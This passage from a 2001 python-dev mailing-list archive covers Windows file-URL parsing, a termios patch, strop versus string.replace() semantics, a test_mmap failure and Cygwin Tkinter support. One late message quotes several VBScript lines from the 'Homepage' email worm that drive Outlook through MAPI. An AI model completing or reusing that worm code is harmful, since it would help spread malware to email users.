"file:///%s" % urllib2.__file__ then it fails like this instead, but very quickly: C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py Traceback (most recent call last): File "../lib/test/test_urllib2.py", line 15, in ? 
f = urllib2.urlopen(file_url) File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen return _opener.open(url, data) File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open '_open', req) File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain result = func(*args) File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open return self.open_local_file(req) File "c:\code\python\dist\src\lib\urllib2.py", line 925, in open_local_file return addinfourl(open(url2pathname(file), 'rb'), IOError: [Errno 2] No such file or directory: '\\c:\\code\\python\\dist\\src\\lib\\urllib2.pyc' Here's what I know about URLs: . Here's what I know about file URLs: . Here's what I know about file URLs on Windows: . If I type the original file://c:\code\python\dist\src\lib\urllib2.pyc into IE's address bar, it actually *executes* urllib2. From mwh@python.net Wed May 9 20:50:34 2001 From: mwh@python.net (Michael Hudson) Date: 09 May 2001 20:50:34 +0100 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25 In-Reply-To: "Fred L. Drake"'s message of "Mon, 07 May 2001 10:55:37 -0700" References: Message-ID: "Fred L. Drake" writes: > ! fd = PyObject_AsFileDescriptor(obj); > ! if (fd == -1) { > ! if (PyInt_Check(obj)) { ^^^^^^^^^^^^^^^^ this is a bit pointless. I admit ->> termios.tcgetattr(-2) Traceback (most recent call last): File "", line 1, in ? TypeError: tcgetattr, arg 1: can't extract file descriptor from "int" is a bit confusing, but I'm not sure ->> termios.tcgetattr(-2) Traceback (most recent call last): File "", line 1, in ? error: (9, 'Bad file descriptor') is any better than: ->> termios.tcgetattr(-2) Traceback (most recent call last): File "", line 1, in ? 
ValueError: file descriptor cannot be a negative integer (-2) which is what you get after applying this patch: Index: Modules/termios.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Modules/termios.c,v retrieving revision 2.26 diff -c -r2.26 termios.c *** Modules/termios.c 2001/05/09 17:53:06 2.26 --- Modules/termios.c 2001/05/09 19:49:52 *************** *** 37,43 **** fd = PyObject_AsFileDescriptor(obj); if (fd == -1) { if (PyInt_Check(obj)) { ! fd = PyInt_AS_LONG(obj); } else { char* tname; --- 37,43 ---- fd = PyObject_AsFileDescriptor(obj); if (fd == -1) { if (PyInt_Check(obj)) { ! return 0; } else { char* tname; Cheers, M. From fdrake@acm.org Wed May 9 21:09:09 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Wed, 9 May 2001 16:09:09 -0400 (EDT) Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25 In-Reply-To: References: Message-ID: <15097.41957.820142.77750@cj42289-a.reston1.va.home.com> Michael Hudson writes: > this is a bit pointless. You're right! (Hey, it was your patch. ;) I'm checking in a different patch -- essentially, PyObject_AsFileDescriptor() does the right thing, and we don't ever need to second guess it. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From mwh@python.net Wed May 9 21:13:46 2001 From: mwh@python.net (Michael Hudson) Date: 09 May 2001 21:13:46 +0100 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 02 May 2001 21:55:25 +0200" References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > I've attached the patch. 
Due to a small reorganisation the patch is > a little longer -- symmetry has its price at C level too ;-) I may be being dense, but can you explain what's going on here: ->> u'\u00e3'.encode('latin-1') '\xe3' ->> u'\u00e3'.encode("latin-1").decode("latin-1") Traceback (most recent call last): File "", line 1, in ? UnicodeError: ASCII encoding error: ordinal not in range(128) Can you come up with some other example I can use it tomorrow's python-dev summary? Cheers, M. -- Remember - if all you have is an axe, every problem looks like hours of fun. -- Frossie -- http://home.xnet.com/~raven/Sysadmin/ASR.Quotes.html From mwh@python.net Wed May 9 21:18:47 2001 From: mwh@python.net (Michael Hudson) Date: 09 May 2001 21:18:47 +0100 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25 References: <15097.41957.820142.77750@cj42289-a.reston1.va.home.com> Message-ID: "Fred L. Drake, Jr." writes: > Michael Hudson writes: > > this is a bit pointless. > > You're right! (Hey, it was your patch. ;) So it was! I must have uploaded a slightly stale version of the patch, because I noticed this when cvs update conflicted with what I had in Modules/termios.c... oops. > I'm checking in a different patch -- essentially, > PyObject_AsFileDescriptor() does the right thing, and we don't ever > need to second guess it. I was a bit concerned that the error should contain the function name. On reflection, I agree that the code is so much simpler that it's a win. Cheers, M. -- Java sucks. [...] Java on TV set top boxes will suck so hard it might well inhale people from off their sofa until their heads get wedged in the card slots. --- Jon Rabone, ucam.chat From paulp@ActiveState.com Wed May 9 21:48:38 2001 From: paulp@ActiveState.com (Paul Prescod) Date: Wed, 09 May 2001 13:48:38 -0700 Subject: [Python-Dev] test_urllib2 fails on Win98SE References: Message-ID: <3AF9AD26.AC6DD323@ActiveState.com> Tim Peters wrote: > >... 
> > Here's what I know about file URLs on Windows: .

We constantly run into these problems with Komodo. The long and short
is that file URL handling on Windows is totally different than on Unix
and platform-specific code is probably appropriate.

Here's what I know: IE treats the following equivalently:

c:\temp\diff.txt
file:c:\temp\diff.txt
file:/c:\temp\diff.txt
file://c:\temp\diff.txt
file:///c:\temp\diff.txt
file:///////////////////////////////c:\temp\diff.txt

You can also reverse backslashes to slashes and slashes to backslashes
if you like.

Interestingly, though, UNC paths seem to work okay (no matter how you
do the slashes and backslashes):

file://americano\home\paulp\foo.html

UNC paths seem to only allow two leading slashes/backslashes.

Truly this is a new level of "be liberal in what you accept". The
algorithm is probably something like:

1. normalize to forward slashes.
2. Remove "file:".
3. What you have left should be of the form:

   //machine/path

   or

   (/*)x:/path

   Where x is the drive letter.

-- 
Take a recipe. Leave a recipe.
Python Cookbook!  http://www.ActiveState.com/pythoncookbook

From fredrik@effbot.org Thu May 10 00:19:40 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Thu, 10 May 2001 01:19:40 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
References: 
Message-ID: <05e001c0d8de$87fcb9c0$e46940d5@hagrid>

tim wrote:

> Modified Files:
>   stropmodule.c
> Log Message:
> SF bug #422088: [OSF1 alpha] string.replace().
> Platform blew up on "123".replace("123", "").  Michael Hudson pinned the
> blame on platform malloc(0) returning NULL.

any reason why the

    #ifdef MALLOC_ZERO_RETURNS_NULL

macro (in pyport.h) isn't set / doesn't take care of this?

(and is it just me, or does the strop.replace function allocate
a buffer, copy the result to that buffer, only to copy it into a
string and throw the buffer away?
no wonder u"".replace() is 30% faster than "".replace() ;-)

Cheers /F

From tim@digicool.com Thu May 10 00:39:08 2001
From: tim@digicool.com (Tim Peters)
Date: Wed, 9 May 2001 19:39:08 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <05e001c0d8de$87fcb9c0$e46940d5@hagrid>
Message-ID: 

[Fredrik Lundh]
> any reason why the
>
>     #ifdef MALLOC_ZERO_RETURNS_NULL
>
> macro (in pyport.h) isn't set / doesn't take care of this?

The code uses PyMem_MALLOC, which after a chain of umpteen #defines ends
up being plain malloc.  As Michael noted in the bug report, it could have
used PyMem_Malloc() instead and avoided the problem.  But I chose not to
do that, since special-casing a result of 0 was more efficient for
reasons other than malloc.  However:

> (and is it just me, or does the strop.replace function allocate
> a buffer, copy the result to that buffer, only to copy it into a
> string and throw the buffer away?

Yes.  And I'm returning something now that mustn't be free()'ed when the
result length is 0.  Will fix.

> no wonder u"".replace() is 30% faster than "".replace() ;-)

For a given number of characters or bytes ?

From tim.one@home.com Thu May 10 00:46:13 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 19:46:13 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: 
Message-ID: 

Oh, fuck.  Somebody remind me why we have both stropmodule.c and
stringobject.c?  These bugs exist in both.

From mike.mellor@tbe.com Thu May 10 01:16:28 2001
From: mike.mellor@tbe.com (mike.mellor@tbe.com)
Date: Thu, 10 May 2001 00:16:28 -0000
Subject: [Python-Dev] CygWin and Tkinter
Message-ID: <9dcmks+6aqf@eGroups.com>

I am playing around with CygWin (which came with Python 2.1
installed).  While I can run command line programs, Tkinter is not
part of the package.  TCL/TK is installed and I have been able to
build TK GUI's.
How can I get Tkinter added to my Python package?  Thanks.

Mike

From tim.one@home.com Thu May 10 01:47:52 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 20:47:52 -0400
Subject: [Python-Dev] Inconsistent string.replace() behavior
Message-ID: 

test_strop.py contains this line:

    test('replace', 'one!two!three!', 'one@two@three@', '!', '@', 0)

string_tests.py has this:

    test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0)

IOW, the test suite insists that

    strop.replace('one!two!three!', '!', '@', 0)

replace all matches but that

    string.replace('one!two!three!', '!', '@', 0)
and
    'one!two!three!'.replace('!', '@', 0)

replace nothing.

I've been thrashing like a madman trying to fix a common bug in both
modules (in out-of-synch copies of mymemreplace), and every time I think
I fix something "the other" module breaks.  The above appears to be why.

My opinion:  the test_strop.py test is in error, and so was
strop_replace() in stropmodule.c.  I'm checking in changes accordingly,
but won't mind getting yelled at if you disagree.

From greg@cosc.canterbury.ac.nz Thu May 10 01:56:12 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 10 May 2001 12:56:12 +1200 (NZST)
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
In-Reply-To: 
Message-ID: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz>

Tim Peters :

> PyObject *t = (PyObject *)op;
> PyString_InternInPlace(&t);

If you want to keep it all on one line, you could try

  PyString_InternInPlace((PyObject **)&op);

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,          | A citizen of NewZealandCorp, a       |
Christchurch, New Zealand          | wholly-owned subsidiary of USA Inc.
| greg@cosc.canterbury.ac.nz +--------------------------------------+ From guido@digicool.com Thu May 10 03:00:36 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:00:36 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Your message of "Wed, 09 May 2001 19:46:13 -0400." References: Message-ID: <200105100200.VAA00411@cj20424-a.reston1.va.home.com> > Oh, fuck. Somebody remind me why we have both stropmodule.c and > stringobject.c? These bugs exist in both. In my mind, strop is obsolete. We keep it around because some losers like to import it directly, but it's basically dead, and except for a few functions, string.py doesn't use it any more. (The exceptions are maketrans, lowercase, uppercase, whitespace.) --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Thu May 10 03:01:20 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:01:20 -0500 Subject: [Python-Dev] CygWin and Tkinter In-Reply-To: Your message of "Thu, 10 May 2001 00:16:28 GMT." <9dcmks+6aqf@eGroups.com> References: <9dcmks+6aqf@eGroups.com> Message-ID: <200105100201.VAA00435@cj20424-a.reston1.va.home.com> > I am playing around with CygWin (which came with Pyhton 2.1 > installed). While I can run command line programs, Tkinter is not > part of the package. TCL/TK is installed and I have been able to > build TK GUI's. How can I get Tkinter added to my Python package? > Thanks. Beats me. Ask whoever produces the CygWin port. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Thu May 10 02:07:40 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 21:07:40 -0400 Subject: [Python-Dev] gcc barfs on recent stringobject changes... 
In-Reply-To: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz> Message-ID: >> PyObject *t = (PyObject *)op; >> PyString_InternInPlace(&t); [Greg Ewing] > If you want to keep it all on one line, you could try > > PyString_InternInPlace((PyObject **)&op); op is declared "register" so it's not strictly legal to apply the address-of operator to it regardless. Besides, Guido pays me by the line . or-maybe-by-the-useless-checkin-to-judge-from-the-last-24-hours-ly y'rs - tim From gward@python.net Thu May 10 02:08:58 2001 From: gward@python.net (Greg Ward) Date: Wed, 9 May 2001 21:08:58 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:00:36PM -0500 References: <200105100200.VAA00411@cj20424-a.reston1.va.home.com> Message-ID: <20010509210858.A3467@gerg.ca> On 09 May 2001, Guido van Rossum said: > In my mind, strop is obsolete. We keep it around because some losers > like to import it directly, but it's basically dead, and except for a > few functions, string.py doesn't use it any more. (The exceptions are > maketrans, lowercase, uppercase, whitespace.) Perhaps 2.2 should deprecate direct use of strop noisily -- warn when imported, except when imported by string.py. (No idea how you'd implement that, I'm just spouting off.) Then it could go away in 2.3. I don't think there's anything particularly controversial about 'strop' going away after one release with a deprecation warning -- it's not 'string', after all! (Ie. imported by every single scrap of Python code ever written before string methods came along, and by quite a lot since then.) Greg -- Greg Ward - nerd gward@python.net http://starship.python.net/~gward/ I joined scientology at a garage sale!! 
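Paul Prescod's three-step recipe for Windows file URLs, earlier in this digest, is concrete enough to sketch. The Python below is an illustration written against his list of forms IE accepts; it is not code from the thread, from Komodo, or from urllib. The function name is hypothetical, and rejecting a machine name preceded by three or more slashes follows his remark that UNC paths seem to allow only two.

```python
import re
from typing import Optional, Tuple

# Hypothetical helper modelling the three steps Paul describes from IE's
# observed behaviour; it is not a standards-based file-URL parser.
_DRIVE = re.compile(r"/*([A-Za-z]):(/.*)?")  # any number of leading slashes, then x:
_UNC = re.compile(r"//([^/]+)(/.*)")         # exactly two leading slashes, then machine


def parse_windows_file_url(url: str) -> Tuple[Optional[str], str]:
    """Return (machine, path) for a UNC URL, or (None, "x:/path") for a drive path."""
    s = url.replace("\\", "/")          # step 1: normalise to forward slashes
    if s[:5].lower() == "file:":        # step 2: strip the scheme, if present
        s = s[5:]
    m = _DRIVE.fullmatch(s)             # step 3a: (/*)x:/path
    if m:
        return None, m.group(1) + ":" + (m.group(2) or "/")
    m = _UNC.fullmatch(s)               # step 3b: //machine/path
    if m:
        return m.group(1), m.group(2)
    raise ValueError("unrecognised Windows file URL: %r" % url)


if __name__ == "__main__":
    print(parse_windows_file_url(r"file:///////c:\temp\diff.txt"))
    print(parse_windows_file_url(r"file://americano\home\paulp\foo.html"))
```

The two calls print (None, 'c:/temp/diff.txt') and ('americano', '/home/paulp/foo.html'). The drive-letter pattern is tried first so that file://c:\temp\diff.txt is not mistaken for a machine named "c:".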
From guido@digicool.com Thu May 10 03:12:55 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:12:55 -0500 Subject: [Python-Dev] Inconsistent string.replace() behavior In-Reply-To: Your message of "Wed, 09 May 2001 20:47:52 -0400." References: Message-ID: <200105100212.VAA00491@cj20424-a.reston1.va.home.com> > test_strop.py contains this line: > > test('replace', 'one!two!three!', 'one@two@three@', '!', '@', 0) > > string_tests.py has this: > > test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0) > > IOW, the test suite insists that > > strop.replace('one!two!three!', '!', '@', 0) > > replace all matches but that > > string.replace('one!two!three!', '!', '@', 0) > and > 'one!two!three!'.replace('!', '@', 0) > > replace nothing. > > I've been thrashing like a madman trying to fix a common bug in both modules > (in out-of-synch copies of mymemreplace), and every time I think I fix > something "the other" module breaks. The above appears to be why. > > My opinion: the test_strop.py test is in error, and so was strop_replace() > in stropmodule.c. I'm checking in changes accordingly, but won't mind > getting yelled at if you disagree. HMMMMMM! In Python 1.5, a count of zero always replaces all occurrences, both using string and using strop. In 2.0 and later, strop's replace(..., 0) still replaces all, but string's replaces none. The replace() method of strings and unicode objects agrees with string.py. I think this change was made in the sake of ease of documenting the behavior: special-casing the count of zero is unexpected. I very vaguely recall that it was discussed on this list. So this suggests that test_string is correct, and string.replace() (and the methods) shouldn't be "fixed"! But since we're not really supporting strop any more, I think that strop shouldn't be changed either. So we'll have to live with the difference -- sorry! 
--Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Thu May 10 02:13:20 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 21:13:20 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > In my mind, strop is obsolete. We keep it around because some losers > like to import it directly, but it's basically dead, and except for a > few functions, string.py doesn't use it any more. (The exceptions are > maketrans, lowercase, uppercase, whitespace.) So if Fred changes the docs to say it's obsolete, maybe we can actually rip out the buggy and redundant code it contains in about 2 years . cheeredly y'rs - tim From guido@digicool.com Thu May 10 03:25:43 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:25:43 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Your message of "Wed, 09 May 2001 21:08:58 -0400." <20010509210858.A3467@gerg.ca> References: <200105100200.VAA00411@cj20424-a.reston1.va.home.com> <20010509210858.A3467@gerg.ca> Message-ID: <200105100225.VAA00592@cj20424-a.reston1.va.home.com> > Perhaps 2.2 should deprecate direct use of strop noisily -- warn when > imported, except when imported by string.py. (No idea how you'd > implement that, I'm just spouting off.) Then it could go away in 2.3. I have had the necessary mods sitting in my directory for months (it was one of my first tests for using the warnings module), but decided against checking it in because I found there's quite a bit of code that triggered the warnings. Maybe I should check it in into 2.2a0, so developers can get used to it. > I don't think there's anything particularly controversial about 'strop' > going away after one release with a deprecation warning -- it's not > 'string', after all! (Ie. 
imported by every single scrap of Python code > ever written before string methods came along, and by quite a lot since > then.) Agreed. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Thu May 10 03:27:23 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:27:23 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Your message of "Wed, 09 May 2001 21:13:20 -0400." References: Message-ID: <200105100227.VAA00607@cj20424-a.reston1.va.home.com> > [Guido] > > In my mind, strop is obsolete. We keep it around because some losers > > like to import it directly, but it's basically dead, and except for a > > few functions, string.py doesn't use it any more. (The exceptions are > > maketrans, lowercase, uppercase, whitespace.) > > So if Fred changes the docs to say it's obsolete, maybe we can actually rip > out the buggy and redundant code it contains in about 2 years . Yes, but in the mean time the fact that it's buggy doesn't bother me at all. Let it be as buggy as it always was -- that's one more reason to stop using it! :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Thu May 10 02:33:52 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 21:33:52 -0400 Subject: [Python-Dev] Inconsistent string.replace() behavior In-Reply-To: <200105100212.VAA00491@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > HMMMMMM! In Python 1.5, a count of zero always replaces all > occurrences, both using string and using strop. In 2.0 and later, > strop's replace(..., 0) still replaces all, but string's replaces > none. The replace() method of strings and unicode objects agrees with > string.py. > > I think this change was made in the sake of ease of documenting the > behavior: special-casing the count of zero is unexpected. Yes, -1 == infinity is much clearer . > I very vaguely recall that it was discussed on this list. 
> > So this suggests that test_string is correct, and string.replace() > (and the methods) shouldn't be "fixed"! I didn't change their behavior wrt replace()'s interpretation of count, but to repair an unrelated bug (bogus MemoryError for an empty-string *result*) that happened to appear in both copies of mymemreplace sitting in the code base (one in stringobject.c, another but out-of-synch one in stropmodule.c). That's how stropmodule got sucked into this: to fix the gross null-string result bug common to both. > But since we're not really supporting strop any more, I think that > strop shouldn't be changed either. So we'll have to live with the > difference -- sorry! OK, I've restored the 0 == infinity semantics to strop.replace() and test_strop.py, but have not backed out the null-string result fix, nor the pain to make the mymemreplace clones identical again. From tim.one@home.com Thu May 10 03:00:30 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 22:00:30 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Yes, but in the mean time the fact that it's buggy doesn't bother me > at all. Let it be as buggy as it always was -- that's one more reason > to stop using it! :-) I think that's unsustainable in this specific case: stringobject and stropmodule contained several utility functions with the same names that clearly started life as identical code. Over time they got out of synch, and when they punched me in the face today, I had no idea which was "right" and which "wrong". Turned out they both had the same bug, and the clearest way to fix it in stringobject.c without leaving a more inconsistent x-module mess was to bring the once-common utility routines back into synch. As /F said, though, the mymemreplace() approach is inefficient and "should be" replaced wholesale. 
If that's done in stringobject.c alone, great, then I won't care about the legacy routines in stropmodule.c either. What I can't abide is having one copy of a function in the codebase work and a clone of it not work -- unless you can keep the undocumented history of both in your mind at all times, you're just as likely to bump into the broken one first when searching the code base, and if you're unlucky never even realize it is "the broken one" (or, if you're lucky, bump into the good one too, and then pee away time trying to understand the differences). i-have-garbage-in-my-kitchen-too-but-i-put-it-in-a-bag-so-i-don't- eat-it-by-mistake-ly y'rs - tim From Jason.Tishler@dothill.com Thu May 10 03:06:15 2001 From: Jason.Tishler@dothill.com (Jason Tishler) Date: Wed, 9 May 2001 22:06:15 -0400 Subject: [Python-Dev] CygWin and Tkinter In-Reply-To: <200105100201.VAA00435@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:01:20PM -0500 References: <9dcmks+6aqf@eGroups.com> <200105100201.VAA00435@cj20424-a.reston1.va.home.com> Message-ID: <20010509220615.A1928@dothill.com> Mike, On Wed, May 09, 2001 at 09:01:20PM -0500, Guido van Rossum wrote: > > I am playing around with CygWin (which came with Pyhton 2.1 > > installed). While I can run command line programs, Tkinter is not > > part of the package. TCL/TK is installed and I have been able to > > build TK GUI's. How can I get Tkinter added to my Python package? > > Thanks. > > Beats me. Ask whoever produces the CygWin port. I am the Cygwin Python maintainer. Please see the following for my views on adding Tkinter support to Cygwin Python: http://sources.redhat.com/ml/cygwin/2001-04/msg01842.html If Tkinter support is important to you, then please submit the appropriate patches for consideration to the Python Patch Manager on SourceForge. Norman Vine has built a Cygwin Python that supports Tkinter. 
See the following for his build procedure:

    http://www.vso.cape.com/~nhv/files/python/

Perhaps you would like to collaborate with Norman on this effort?

Thanks,
Jason

-- 
Jason Tishler
Director, Software Engineering       Phone: +1 (732) 264-8770 x235
Dot Hill Systems Corp.               Fax:   +1 (732) 264-8798
82 Bethany Road, Suite 7             Email: Jason.Tishler@dothill.com
Hazlet, NJ 07730 USA                 WWW:   http://www.dothill.com

From tim.one@home.com Thu May 10 03:54:45 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 22:54:45 -0400
Subject: [Python-Dev] test_mmap failing?
Message-ID: 

I checked in a change to mmapmodule.c earlier today, to close a patch
complaining about unused vrbl warnings.  Here's the changed routine
before ("value" is unused):

mmap_read_byte_method(mmap_object *self,
                      PyObject *args)
{
    char value;
    char *where;
    CHECK_VALID(NULL);
    if (!PyArg_ParseTuple(args, ":read_byte"))
        return NULL;
    if (self->pos < self->size) {
        where = self->data + self->pos;
        value = (char) *(where);
        self->pos += 1;
        return Py_BuildValue("c", (char) *(where));
    } else {
        PyErr_SetString (PyExc_ValueError, "read byte out of range");
        return NULL;
    }
}

and after:

mmap_read_byte_method(mmap_object *self,
                      PyObject *args)
{
    CHECK_VALID(NULL);
    if (!PyArg_ParseTuple(args, ":read_byte"))
        return NULL;
    if (self->pos < self->size) {
        char value = self->data[self->pos];
        self->pos += 1;
        return Py_BuildValue("c", value);
    } else {
        PyErr_SetString (PyExc_ValueError, "read byte out of range");
        return NULL;
    }
}

I'll be damned if I can see any semantic difference, and test_mmap
worked fine on Windows after the change.
But Fred reported:

"""
the fix introduced breakage on Linux (kernel 2.2.17):

cj42289-a(.../python/linux-beowolf); ./python ../Lib/test/regrtest.py -v test_mmap
test_mmap
test_mmap
test test_mmap crashed -- exceptions.IOError: [Errno 22] Invalid argument
Traceback (most recent call last):
  File "../Lib/test/regrtest.py", line 246, in runtest
    __import__(test, globals(), locals(), [])
  File "../Lib/test/test_mmap.py", line 124, in ?
    test_both()
  File "../Lib/test/test_mmap.py", line 14, in test_both
    f.write('\0'* PAGESIZE)
IOError: [Errno 22] Invalid argument
1 test failed: test_mmap
"""

However, at the point that's failing, test_mmap hasn't even *created* an
mmap'ed file yet, let alone tried to read from it.  The only thing
test_mmap did so far is (the first comment is bogus -- that's the
builtin Python open() function):

    # Create an mmap'ed file        # THIS IS A BOGUS COMMENT
    f = open('foo', 'w+')

    # Write 2 pages worth of data to the file
    f.write('\0'* PAGESIZE)         # THIS IS THE LINE IT'S DYING ON

But having suffered too many "impossible problems" the last 36 hours, my
confidence is shot <0.93 wink>.  Is test_mmap failing for anyone else
under current CVS?  Fred, are you *sure* it fails for you -- if so, does
the problem actually go away if you revert mmapmodule.c?

looking-for-sense-in-all-the-wrong-places-ly y'rs  - tim

From jeremy@digicool.com Thu May 10 04:17:34 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Wed, 9 May 2001 23:17:34 -0400 (EDT)
Subject: [Python-Dev] test_mmap failing?
In-Reply-To: 
References: 
Message-ID: <15098.2126.368714.159135@slothrop.digicool.com>

The latest CVS build works on my Linux 2.2.12 system.  No problem with
test_mmap.  But test_pty does fail with some complaints about FCNTL,
which Fred just removed.  Maybe Fred is working in an alternate
universe where test_mmap and test_pty are swapped.

Jeremy

From barry@digicool.com Thu May 10 05:08:42 2001
From: barry@digicool.com (Barry A.
Warsaw) Date: Thu, 10 May 2001 00:08:42 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 References: Message-ID: <15098.5194.677531.35326@anthem.wooz.org> >>>>> "TP" == Tim Peters writes: TP> Oh, fuck. Somebody remind me why we have both stropmodule.c TP> and stringobject.c? These bugs exist in both. IIRC, I once proposed to share code bases through elaborate #includes and exported functions, but that never went very far. Guido's already pronounced on this, and I'd say good riddance to strop. >>>>> "GvR" == Guido van Rossum writes: GvR> Yes, but in the mean time the fact that it's buggy doesn't GvR> bother me at all. Let it be as buggy as it always was -- GvR> that's one more reason to stop using it! :-) -----------------------------------^^^^ For a minute there, I thought you said "to strop using it". :) -Barry From fredrik@pythonware.com Thu May 10 07:22:53 2001 From: fredrik@pythonware.com (Fredrik Lundh) Date: Thu, 10 May 2001 08:22:53 +0200 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 References: Message-ID: <004001c0d919$a62de7d0$e46940d5@hagrid> Tim Peters wrote: > I think that's unsustainable in this specific case: stringobject and > stropmodule contained several utility functions with the same names that > clearly started life as identical code. Over time they got out of synch, and > when they punched me in the face today, I had no idea which was "right" and > which "wrong". Turned out they both had the same bug, and the clearest way > to fix it in stringobject.c without leaving a more inconsistent x-module mess > was to bring the once-common utility routines back into synch. > > As /F said, though, the mymemreplace() approach is inefficient and "should > be" replaced wholesale. If that's done in stringobject.c alone, great, then > I won't care about the legacy routines in stropmodule.c either. 
as a footnote, SRE uses the same source code to generate both 8-bit and 16-bit versions of the match engine. I see no reason why we cannot do the same for the string operations (PyString, PyUnicode, and strop). if anyone wants me to look into this, just say "go ahead". > > no wonder u"".replace() is 30% faster than "".replace() ;-) > > For a given number of characters or bytes ? characters. judging from the SRE benchmarks, modern platforms can process 16-bit characters as fast as they can process 8-bit characters. Cheers /F From thomas@xs4all.net Thu May 10 10:31:38 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Thu, 10 May 2001 11:31:38 +0200 Subject: [Python-Dev] Homepage In-Reply-To: <200105091712.TAA05172@core.inf.ethz.ch>; from pedroni@inf.ethz.ch on Wed, May 09, 2001 at 07:12:20PM +0200 References: <200105091712.TAA05172@core.inf.ethz.ch> Message-ID: <20010510113138.K16486@xs4all.nl> On Wed, May 09, 2001 at 07:12:20PM +0200, Samuele Pedroni wrote: > Set s=CreateObject("Outlook.Application") > Set t=s.GetNameSpace("MAPI") > Set u=t.GetDefaultFolder(6) [..] > Set u=t.GetDefaultFolder(3) I know it's off-topic, but Greg started it! ;-) Does anyone know which folders those two 'GetDefaultFolder' statements open ? I suspect it's sent-mail and trash, or some such, but I don't know enough about Outlook to know if it even *has* sent-mail and trash folders :) Thanx for sending it through, Samuele, it was fun reading, and useful to our helpdesk (especially the fact that it only sends out mails once, even though it starts the porn page every time, and that it doesn't do anything harmful at all.) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! 
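Fredrik's footnote, that SRE builds its 8-bit and 16-bit engines from one source, can be illustrated at the Python level. The sketch below writes a single replace routine against operations that str and bytes share (find, slicing, join). It is a hypothetical illustration, not the algorithm in stringobject.c or stropmodule.c. It follows the count rule Guido settles on (0 replaces nothing, a negative count replaces everything) and returns the empty result for "123".replace("123", "") that triggered SF bug #422088.

```python
from typing import List, TypeVar

# One function body serves both str and bytes.  Hypothetical name; a sketch only.
S = TypeVar("S", str, bytes)


def replace_generic(s: S, old: S, new: S, count: int = -1) -> S:
    """Replace up to `count` occurrences of `old` with `new`.

    A negative count means "no limit" and 0 means "replace nothing",
    matching the string_tests.py rule rather than the old strop one.
    """
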